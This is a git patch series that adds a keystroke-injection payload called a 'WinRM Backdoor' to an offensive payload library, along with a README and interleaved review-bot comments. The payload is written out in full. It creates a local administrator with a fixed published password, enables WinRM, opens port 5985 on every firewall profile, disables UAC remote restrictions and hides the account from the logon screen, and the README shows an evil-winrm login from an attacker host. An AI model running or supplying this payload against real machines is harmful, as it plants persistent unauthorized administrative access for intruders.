From 49a8daf440b3d675838b71334321d1cd335efe31 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Tue, 9 Aug 2022 03:15:51 -0400
Subject: [PATCH 1/2] Add "Microsoft Windows" WinRM Backdoor

1) Adds a user account (OMG_User:OMG_P@ssW0rD).
2) Adds this local user to local administrator group.
3) Enables "Windows Remote Management" with default settings.
4) Adds a rule to the firewall.
5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
6) Hides this user account.
---
 .../win_winrm-backdoor/README.md | 28 +++++++
 .../win_winrm-backdoor/payload.txt | 79 +++++++++++++++++++
 2 files changed, 107 insertions(+)
 create mode 100644 payloads/library/remote_access/win_winrm-backdoor/README.md
 create mode 100644 payloads/library/remote_access/win_winrm-backdoor/payload.txt

diff --git a/payloads/library/remote_access/win_winrm-backdoor/README.md b/payloads/library/remote_access/win_winrm-backdoor/README.md
new file mode 100644
index 0000000..6e22914
--- /dev/null
+++ b/payloads/library/remote_access/win_winrm-backdoor/README.md
@@ -0,0 +1,28 @@
+# "Microsoft Windows" WinRM Backdoor
+
+- Title: "Microsoft Windows" WinRM Backdoor
+- Author: TW-D
+- Version: 1.0
+- Target: Microsoft Windows
+- Category: Remote Access
+
+## Description
+
+1) Adds a user account (OMG_User:OMG_P@ssW0rD).
+2) Adds this local user to local administrator group.
+3) Enables "Windows Remote Management" with default settings.
+4) Adds a rule to the firewall.
+5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
+6) Hides this user account.
+
+## Exploitation
+
+>
+> The connection identifiers will be those defined by the values : **OMG_User** and **OMG_P@ssW0rD**.
+>
+
+```
+hacker@hacker-computer:~$ evil-winrm --ip --user OMG_User --password 'OMG_P@ssW0rD'
+*Evil-WinRM* PS C:\Users\OMG_User\Documents> whoami
+desktop-xxxxxxx\omg_user
+```
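Review bot: The Description section lists what the payload adds but says nothing about the exposure it creates or what it leaves behind, which is the information a reader of this entry most needs. It should state that the new account is a member of Administrators with a password that is fixed and published in this README, that the firewall rule is applied to the PUBLIC profile as well as PRIVATE and DOMAIN, and that `LocalAccountTokenFilterPolicy=1` lifts the UAC remote restriction for every local administrator on the host, not only OMG_User. Since nothing in the payload reverts any of this, a short "Artifacts / restore" list naming the account, the group membership, the WinRM service configuration, the rule "Windows Remote Management for OMG" and the two registry values would let an authorized tester return the host to its prior state and makes the persistent weakening explicit.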
diff --git a/payloads/library/remote_access/win_winrm-backdoor/payload.txt b/payloads/library/remote_access/win_winrm-backdoor/payload.txt
new file mode 100644
index 0000000..27604ef
--- /dev/null
+++ b/payloads/library/remote_access/win_winrm-backdoor/payload.txt
@@ -0,0 +1,79 @@
+REM #
+REM # Title: "Microsoft Windows" WinRM Backdoor
+REM #
+REM # Description:
+REM # 1) Adds a user account (OMG_User:OMG_P@ssW0rD).
+REM # 2) Adds this local user to local administrator group.
+REM # 3) Enables "Windows Remote Management" with default settings.
+REM # 4) Adds a rule to the firewall.
+REM # 5) Sets a value to "LocalAccountTokenFilterPolicy" to disable "UAC" remote restrictions.
+REM # 6) Hides this user account.
+REM #
+REM # Author: TW-D
+REM # Version: 1.0
+REM # Category: Remote Access
+REM # Target: Microsoft Windows
+REM #
+REM # TESTED ON
+REM # ===============
+REM # Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
+REM # Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
+REM #
+REM # REQUIREMENTS
+REM # ===============
+REM # The target user must belong to the 'Administrators' group.
+REM #
+
+REM ######## INITIALIZATION ########
+
+DELAY 1000
+DUCKY_LANG US
+DELAY 1000
+
+REM ######## STAGE1 ########
+
+GUI r
+DELAY 3000
+STRING cmd
+DELAY 1000
+CTRL SHIFT ENTER
+DELAY 3000
+LEFTARROW
+DELAY 5000
+ENTER
+DELAY 5000
+
+REM ######## STAGE2 ########
+
+STRING NET USER OMG_User OMG_P@ssW0rD /ADD
+ENTER
+DELAY 1500
+
+STRING NET LOCALGROUP Administrators OMG_User /ADD
+ENTER
+DELAY 1500
+
+REM ######## STAGE3 ########
+
+STRING WINRM QUICKCONFIG
+ENTER
+DELAY 3000
+
+STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
+ENTER
+DELAY 1500
+
+REM ######## STAGE4 ########
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /f /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
+ENTER
+DELAY 1500
+
+STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /f /v OMG_User /t REG_DWORD /d 0
+ENTER
+DELAY 1500
+
+REM ######## FINISH ########
+
+STRING EXIT
+ENTER
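Review bot: Item 6 of the header comment overstates what STAGE4 does: writing `OMG_User` as a REG_DWORD 0 under `Winlogon\SpecialAccounts\UserList` only removes the account from the logon/Welcome screen, while `NET USER` and the local Users and Groups snap-in still list it. Suggest rewording that header line to `REM # 6) Hides this user account from the logon screen only (still listed by NET USER).` The REQUIREMENTS section should also record that the STAGE3 rule opens TCP 5985 on the PUBLIC profile and that the `LocalAccountTokenFilterPolicy` value in STAGE4 affects every local administrator on the host, and that no stage reverts any of these changes, so an authorized test needs a separate restore step.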
From fd912a27ad3985fd647f0b847d26f581fe182229 Mon Sep 17 00:00:00 2001
From: TW-D <75358550+TW-D@users.noreply.github.com>
Date: Tue, 9 Aug 2022 03:32:25 -0400
Subject: [PATCH 2/2] Update payload.txt

---
 payloads/library/remote_access/win_winrm-backdoor/payload.txt | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/payloads/library/remote_access/win_winrm-backdoor/payload.txt b/payloads/library/remote_access/win_winrm-backdoor/payload.txt
index 27604ef..32bffcc 100644
--- a/payloads/library/remote_access/win_winrm-backdoor/payload.txt
+++ b/payloads/library/remote_access/win_winrm-backdoor/payload.txt
@@ -59,6 +59,10 @@ STRING WINRM QUICKCONFIG
 ENTER
 DELAY 3000
 
+STRING y
+ENTER
+DELAY 1500
+
 STRING NETSH ADVFIREWALL FIREWALL ADD RULE NAME="Windows Remote Management for OMG" PROTOCOL=TCP LOCALPORT=5985 DIR=IN ACTION=ALLOW PROFILE=PUBLIC,PRIVATE,DOMAIN
 ENTER
 DELAY 1500